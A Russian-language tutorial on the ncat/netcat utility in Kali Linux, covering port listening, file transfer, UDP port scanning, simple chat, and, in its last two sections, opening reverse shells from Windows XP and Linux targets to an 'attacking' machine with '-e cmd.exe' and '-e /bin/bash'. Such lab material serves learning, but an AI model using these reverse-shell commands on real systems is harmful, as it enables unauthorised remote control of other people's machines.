Рейтинг@Mail.ru

Kali linux: Как использовать ncat

: в разделе: Open Source
13413

main

Введение – Ncat или netcat это многофункциональная сетевая утилита, которая управляется из командной строки, считывая и записывая информацию о сетях . Ncat был написан для проекта Nmap Project и является в текущий момент вершиной разветвленного семейства Netcat воплощений.

Он разработан в качестве надежного фонового инструмента для мгновенного обеспечения связи с другими приложениями и пользователями в сети. Ncat будет работать не только с IPv4 и IPv6, но и фактически предоставлять пользователям неограниченное число потенциальных применений. Ncat также известен как ШВЕЙЦАРСКИЙ АРМЕЙСКИЙ НОЖ.

Мы можем писать ncat или nc, запуская командные опции. Поэтому не смущайтесь, если я буду использовать различные обозначения ncat. Проще говоря, netcat можно рассматривать как средство для открытия соединения между двумя устройствами и получения назад двух потоков.

В этом уроке нам понадобятся два устройства. Здесь я использую kali linux в качестве сервера и backtrack в качестве клиента.

1. Как открыть ncat

A. GUI-способ

Приложение (Application)→ Kali Linux → Сбор информации (Information gathering) → Определение функционирующих хостов (Live Host Identification) → ncat


B. Откройте терминал, напечатайте ncat –h. Эта команда запустит ncat со вспомогательными опциями

2. Прослушивание любого TCP/UDP порта – Мы научимся действовать, как любой сервер с ncat. Позвольте мне прояснить некоторые команды, которые мы будем здесь использовать

Опция -l обеспечит работу в прослушивающем режиме.

Опция -p укажет порт для прослушивания.

Опция -v установит интерактивный режим.

Для kali linux (сервер)

Синтаксис – ncat –lvvp port

Пример – ncat –lvvp 25

Для Backtrack (клиент)

Синтаксис – telnet serverIP port

Пример- telnet 192.168.71.129 25

Запустите эту команду в Kali linux (сервер). Вам будет показано, что соединение установлено

Синтаксис – netstat –antp |grep port  (запустите этот синтаксис в новом терминале)

Пример - netstat –antp |grep 25

Это доказательство того, что мы успешно выполнили нашу задачу


3. Передача файла при помощи ncat – мы научимся передавать файл между сервером и клиентом при помощи ncat. ncat –lvvp 3333 > receive.txt заставит ваш ПК прослушать tcp порт 3333 и записать всю информацию с клиента в файл receive.txt.

Команда nc serverIp address 3333 < send.txt, выполненная в клиентской части, установит сессию с сервером и запускает загрузку файла send.txt на сервер. Давайте ознакомимся с этой теорией, прибегая к некоторым практическим примерам, но прежде всего я хочу разъяснить команды еще раз в режиме синтаксиса.

Kali linux (сервер)

Синтаксис - ncat –lvvp port > filename.txt

Пример – ncat –lvvp 3333 > receive.txt

Backtrack (клиент)

Синтаксис – echo “write whatever you want to send” > filename2.txt

ncat serverIP port < filename2.txt

Пример – echo “hello I am a client PC and My name is backtrack” > send.txt

Ncat 192.168.71.129 3333 < send.txt

Здесь видно, что мы преуспели в выполнении нашего задания.

4. Ncat в качестве простого UDP-сканера портов.

Пример – nc -vzu 192.168.71.128 1-255

5. Создание сеанса обмена мгновенными сообщениями посредством ncat – мы будем создавать сеанс обмена сообщениями между сервером и клиентом.

Kali linux (сервер)

Синтаксис – nc –l –p port

Пример – nc –l –p 3333

Здесь опция –l поможет запустить режим слушателя

Опция –p используется для указания номера порта

Backtrack (клиент)

Синтаксис – nc serverIP port

Пример – nc 192.168.71.129 3333

Если все в порядке, то мы получим сообщение и в серверном, и в клиентском ПК, которое они отправляют друг другу, как показано на изображении:

6. Получение доступа к windows Xp посредством ncat – я покажу вам, каким образом вы можете получить доступ к windows Xp в качестве целевой ОС посредством Kali linux в качестве атакующей ОС. Прежде всего, загрузите версию ncat для windows отсюда. Дополнительная информация на изображениях ниже.

Kali linux (Атакующий)

Синтаксис – nc –lvvp port

Пример – nc –lvvp 3333

Здесь мы загрузили ncat для windows

Windows Xp (Цель)

Синтаксис – nc.exe attackerIP port –e cmd.exe

Пример – nc.exe 192.168.71.129 3333 –e cmd.exe

Теперь вы можете видеть, что мы зашли в локальный диск C системы windows xp

Просто для проверки запустите там команду ipconfig. Вы увидите IP-адрес системы Windows Xp

7. Получение доступа к Linux посредством ncat – я покажу вам, каким образом вы можете получить доступ к linux в качестве целевой ОС посредством windows XP в качестве атакующей ОС. Прежде всего, загрузите версию ncat для windows отсюда. Дополнительная информация на изображениях ниже.

Windows Xp (Атакующий)

Синтаксис – nc.exe –lvvp port

Пример – nc.exe –lvvp 3333

Linux (Цель)

Синтаксис – nc AttackerIP –e /bin/bash

Пример – nc 192.168.71.128 3333 –e /bin/bash

Теперь вы можете видеть, что мы зашли в Linux

Просто для проверки запустите здесь команду ipconfig. Вы увидите IP-адрес системы linux

0

Оставить комментарий

Гость Вторник, 12 Ноябрь 2019